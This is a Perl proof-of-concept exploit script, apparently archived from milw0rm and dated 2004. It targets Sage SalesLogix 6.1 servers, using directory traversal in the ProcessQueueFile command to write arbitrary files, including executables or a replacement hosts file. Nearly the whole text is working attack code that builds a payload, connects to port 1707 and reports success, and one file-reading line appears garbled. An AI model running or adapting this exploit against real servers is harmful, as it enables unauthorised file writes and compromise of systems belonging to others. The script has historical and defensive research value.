#!/usr/bin/perl # # Proof of concept exploit: Arbitrary file creation for SLX server 6.1 # # Written by Carl Livitt, Agenda Security Services, June 2004. # # This exploit abuses the ProcessQueueFile command on SLX 6.1 (others?) servers # to create arbitrary files on the filesystem of the SLX server. By using # directory traversal, it is possible to escape from the Queue directory and # write anywhere on the SLX server's filesystem. # use IO::Socket; print "slx_uploader - Uploads arbitrary files to Sage SalesLogix servers.\n"; print "By Carl Livitt @ Agenda Security Services, June 2004\n\n"; if($#ARGV!=2) { print "Syntax: $0 host filename_to_create file_to_upload\n\n"; print "Example:\n"; print " $0 10.0.0.100 \\\\winnt\\\\system32\\\\drivers\\\\etc\\\\hosts evil.txt\n\n"; print "The above example would upload the local file 'evil.txt' to the SLX\n"; print "server on 10.0.0.100, overwriting the existing hosts file.\n"; print "It is possible to upload binary files, e.g. executables, with this exploit.\n\n"; exit(1); } else { $host=$ARGV[0]; $create_file=$ARGV[1]; $upload_file=$ARGV[2]; } if((stat($upload_file))[7] > 4096) { print "[*] Error! Files to be uploaded must be less than 4k in size.\n\n"; exit(1); } print "[+] Building payload\n"; $contentLen=43 + length($create_file); $exploit="\x00"x10 . chr($contentLen) . "\x00"x3 . "ProcessQueueFile\x00" . "..\\"x8 . "$create_file" . "\x00"x6; open(UPLOAD, '<', $upload_file) || die "Could not open local file $upload_file\n"; while(($line=)) { $exploit.=$line; } close(UPLOAD); print "[+] Connecting to server $host:1707\n"; $sock=IO::Socket::INET->new("$host:1707") || do {print "[-] Could not connect to server\n"; exit(1); }; print "[+] Sending exploit payload\n"; send($sock,$exploit,0); print "[+] Waiting for response\n"; $sock->recv($data,1024,0); if($data =~ /Received/) { print "[+] Exploit successful\n"; } else { print "[*] Exploit may not have worked.\n"; } $sock->shutdown(2); # milw0rm.com [2004-10-18]